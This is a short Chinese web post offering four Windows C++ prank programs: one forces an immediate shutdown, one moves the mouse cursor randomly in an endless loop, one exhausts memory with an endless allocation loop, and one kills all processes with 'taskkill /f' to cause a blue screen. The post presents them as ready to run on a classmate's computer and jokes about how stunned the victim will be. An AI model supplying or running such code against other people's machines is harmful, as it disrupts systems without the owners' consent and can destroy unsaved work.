赞
踩
1.直接关机
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
system("shutdown /p");
}
2.鼠标乱飞
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
int x1=GetSystemMetrics(SM_CXSCREEN);
int y1=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
for(;;)
SetCursorPos(rand()%x1,rand()%y1);
}
3.卡爆内存
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
for(;;)
malloc(1000000);
}
直接蓝屏(不建议用,威力太大)
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
system("taskkill /f /fi 'pid ge 1'");
return 0;
}
够不够用呢,这威力已经够大了,估计你的同学此时已经蒙了吧
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。